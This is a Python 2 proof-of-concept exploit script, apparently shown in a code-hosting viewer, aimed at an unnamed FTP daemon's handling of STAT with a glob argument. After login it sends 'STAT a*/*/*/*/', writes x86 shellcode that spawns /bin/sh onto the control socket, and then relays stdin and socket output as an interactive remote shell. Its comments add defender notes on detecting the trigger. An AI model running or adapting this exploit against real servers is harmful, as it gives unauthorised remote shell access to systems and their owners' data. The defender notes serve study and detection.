blob: 86ec3cca16a104a63f2eb9d93889890a8531e29a (
plain)
#!/usr/bin/env python
from ftplib import *
import os,time,struct,sys
from select import select
# Proof-of-concept for a flaw in an FTP daemon's handling of STAT with a glob
# argument. The affected server and version are not stated on this page.
# Python 2 only: it uses print statements and writes str objects to the socket.
#
# Defender notes, derived from what the script puts on the wire:
#   * an authenticated session is required (login precedes the trigger), so
#     restricting who may log in narrows exposure;
#   * the trigger is a STAT command whose argument nests several wildcard path
#     components -- unusual in legitimate client traffic and loggable;
#   * non-printable bytes then appear on the FTP *control* channel, which
#     normally carries only text commands and replies.

# Opaque machine-code payload. The literal path "/bin/sh" and a trailing
# newline are visible at its end; the repeated \xcd\x80 pairs look like the
# x86 `int 0x80` encoding -- NOTE(review): architecture/OS not stated, confirm.
shellcode = '\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xc0\x50\x50\x50\xb0\x7f\xcd\x80\xeb\x17\x31\xc0\x5b\x50\x88\x43\x07\x8d\x4b\x08\x89\x5b\x08\x89\x43\x0c\x51\x53\x50\xb0\x3b\xcd\x80\xe8\xe4\xff\xff\xff/bin/sh\x0a'

# Hard-coded private (RFC 1918) address and placeholder credentials.
ftp = FTP()
ftp.connect('192.168.1.2', 21)
ftp.login('username', 'password')

# Fixed pause before the trigger; the reason is not documented in the script.
time.sleep(6)

print 'sending stat command'
# putcmd() only writes the command line; the server's reply is not read here.
ftp.putcmd('STAT a*/*/*/*/')

print 'sending shellcode'
# Raw bytes are written straight to the control socket, bypassing ftplib's
# command framing.
ftp.sock.send(shellcode)
time.sleep(2)

# From here on the control connection is used as a plain bidirectional pipe:
# stdin lines go to the socket, and whatever comes back is echoed to stdout.
# There is no exit condition; the loop runs until interrupted or a call raises.
while True:
    readable, _, _ = select([sys.stdin, ftp.sock], [], [])
    for source in readable:
        if source == sys.stdin:
            line = sys.stdin.readline()
            ftp.sock.send(line)
        if source == ftp.sock:
            data = ftp.sock.recv(1024)
            sys.stdout.write(data)